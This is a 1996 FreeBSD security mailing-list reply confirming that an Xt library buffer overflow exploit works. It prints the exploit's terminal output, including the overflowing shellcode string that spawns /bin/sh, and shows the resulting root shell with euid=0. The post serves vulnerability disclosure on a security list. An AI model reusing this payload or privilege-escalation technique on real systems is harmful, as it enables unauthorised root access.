From owner-freebsd-security Sun Aug 25 13:30:06 1996
Message-Id: <199608251148.NAA25686@keltia.freenix.fr>
Date: Sun, 25 Aug 1996 13:48:21 +0200
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@FreeBSD.ORG
Cc: security-officer@FreeBSD.ORG
Subject: Re: Vulnerability in the Xt library (fwd)
In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500
References: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
X-Mailer: Mutt 0.41

According to Kent Hamilton:
> Thought this might be of interest.

I confirm that it works like a charm here :-(

357 [13:44] roberto@keltia:~/src/C> ./exploit
Using offset of esp + 0 (efbfd3b0)
Buffer size 1491
Warning: Color name "=EB#^^ 1=D2VVVV1=C0=B0;N =CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=BF=EF=B4=D3=BF=EF=EB#^^ 1=D2VVVV1=C0=B0;N =CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=BF=EF=B4=D3=BFH=B3=BF=EF!
# id
uid=101(roberto) euid=0(root) gid=10(staff) groups=10(staff), 0(wheel), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list), 100(copains), 117(dialer), 2000(dos), 2001(tex)

I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I recall.

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia

iQCVAwUBMiA9gwDy2QnruxtBAQGybgP/SFbjUahCvBxn2C7SR8irUwKquF6mOdcS
Z4skE4JF8m1Lf86Nn9ixxs0WIpVtLMQcP5AcijkiMQGPHhwBgRTqPJcTOufkfpP0
9y1iKxWMnB4zxgxpJbT1DHOVhrKRqbbn1xHO/W+i6eH6WHrLRKyCC1j7k1YZBLL4
YQr0Z9n5Bo4=
=sX2i
-----END PGP SIGNATURE-----